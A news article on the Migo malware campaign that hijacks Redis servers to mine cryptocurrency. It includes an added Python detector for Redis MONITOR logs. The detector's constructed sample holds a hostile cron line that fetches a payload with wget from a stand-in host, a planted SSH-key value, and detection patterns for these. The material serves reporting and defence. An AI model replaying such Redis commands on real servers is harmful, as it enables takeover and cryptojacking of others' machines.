New Migo Malware Targeting Redis Servers for Cryptocurrency Mining

By neub9



Feb 20, 2024

Newsroom

Server Security / Cryptojacking

A new malware campaign has been detected targeting Redis servers to gain initial access and eventually mine cryptocurrency on compromised Linux hosts.

“This particular campaign involves the use of a number of novel system weakening techniques against the data store itself,” said Cado security researcher Matt Muir in a technical report.

The cryptojacking attack is enabled by a malware called Migo, a Golang ELF binary that includes compile-time obfuscation and the capability to persist on Linux machines.

The campaign was detected after the cloud security company identified an “unusual series of commands” aimed at its Redis honeypots, commands designed to weaken security defenses by disabling specific configuration options.

It’s believed that these options are turned off to allow the sending of additional commands to the Redis server from external networks and facilitate future exploitation without drawing much attention.

This initial step is followed by two Redis keys being set up, one pointing to an attacker-controlled SSH key and the other to a cron job that retrieves the primary payload from a file transfer service named Transfer.sh, a technique previously observed in early 2023.

The shell script to fetch Migo using Transfer.sh is embedded within a Pastebin file that’s obtained using a curl or wget command.
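The command sequence described above (runtime config weakening, then keys whose values are an SSH public key and a cron line that fetches a payload) is visible in Redis MONITOR output. The following detector is an added example, not code from Cado's report or tooling; it assumes the MONITOR line format printed by redis-cli, and the sample lines, client addresses, key names and payload URL are constructed.

```python
import re
import shlex

# One Redis MONITOR line per command, as redis-cli prints it:
#   <unix ts> [<db> <ip:port>] "CMD" "arg" ...
MONITOR_RE = re.compile(r'^(\d+\.\d+) \[(\d+) (\S+)\] (.*)$')
# Runtime CONFIG SET of these is rarely legitimate on a production instance;
# protected-mode is the option that gates access from external networks.
WATCHED_CONFIGS = {"protected-mode", "dir", "dbfilename"}
# Value markers for the two keys the article describes: an OpenSSH public key
# (key type, space, base64 that always starts with "AAAA") and a cron line
# (five schedule fields, then a command) that fetches with curl or wget.
SSH_KEY_RE = re.compile(r'(?:ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+) AAAA')
CRON_FETCH_RE = re.compile(r'(?:\S+\s+){5}.*\b(?:curl|wget)\b')

def parse_monitor_line(line):
    """Return (client, argv) for a MONITOR line, or None for anything else."""
    m = MONITOR_RE.match(line.strip())
    return (m.group(3), shlex.split(m.group(4))) if m else None

def classify(argv):
    """Label one parsed command; an empty list means nothing suspicious."""
    findings = []
    cmd = argv[0].upper() if argv else ""
    if cmd == "CONFIG" and len(argv) >= 4 and argv[1].upper() == "SET":
        if argv[2].lower() in WATCHED_CONFIGS:
            findings.append(f"config-weakening:{argv[2].lower()}={argv[3]}")
    elif cmd == "SET" and len(argv) >= 3:
        value = argv[2]  # SET key value; newlines appear as literal \n in MONITOR
        if SSH_KEY_RE.search(value):
            findings.append("ssh-key-in-value")
        if CRON_FETCH_RE.search(value):
            findings.append("cron-fetch-in-value")
    return findings

def scan(lines):
    """Return (client, finding) pairs in order of appearance; benign lines add nothing."""
    results = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if parsed:
            results += [(parsed[0], f) for f in classify(parsed[1])]
    return results

# Constructed MONITOR excerpt (not from the report); addresses are documentation space.
SAMPLE_MONITOR = """\
1708412345.001 [0 198.51.100.7:40112] "CONFIG" "SET" "protected-mode" "no"
1708412345.002 [0 198.51.100.7:40112] "SET" "backup1" "\\n\\nssh-ed25519 AAAAC3Nza-CONSTRUCTED x@y\\n\\n"
1708412345.003 [0 198.51.100.7:40112] "SET" "backup2" "\\n* * * * * root wget -q http://payload.invalid/stage1\\n"
1708412346.000 [0 10.0.0.12:53320] "GET" "session:4f2a"
"""

def scan_sample():
    return scan(SAMPLE_MONITOR.splitlines())
```

Three findings from one client within milliseconds, on an instance that should never receive CONFIG SET from the network, is the pattern worth alerting on; a single SET with a long value is not.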


Persistence

The Go-based ELF binary, in addition to incorporating mechanisms to resist reverse engineering, acts as a downloader for an XMRig installer hosted on GitHub. It’s also responsible for performing a series of steps to establish persistence, terminate competing miners, and launch the miner.

In addition, Migo disables Security-Enhanced Linux (SELinux) and searches for uninstallation scripts for monitoring agents bundled in compute instances from cloud providers such as Qcloud and Alibaba Cloud. It further deploys a modified version (“libsystemd.so”) of a popular user-mode rootkit named libprocesshider to hide processes and on-disk artifacts.

It’s worth noting that these actions overlap with tactics used by known cryptojacking groups like TeamTNT, WatchDog, Rocke, and threat actors associated with the SkidMap malware.

“Interestingly, Migo appears to recursively iterate through files and directories under /etc,” Muir noted. “The malware will simply read files in these locations and not do anything with the contents.”

“One theory is this could be a (weak) attempt to confuse sandbox and dynamic analysis solutions by performing a large number of benign actions, resulting in a non-malicious classification.”

Another hypothesis is that the malware is looking for an artifact that’s specific to a target environment, although Cado said it found no evidence to support this line of reasoning.

“Migo demonstrates that cloud-focused attackers are continuing to refine their techniques and improve their ability to exploit web-facing services,” Muir said.

“Although libprocesshider is frequently used by cryptojacking campaigns, this particular variant includes the ability to hide on-disk artifacts in addition to the malicious processes themselves.”
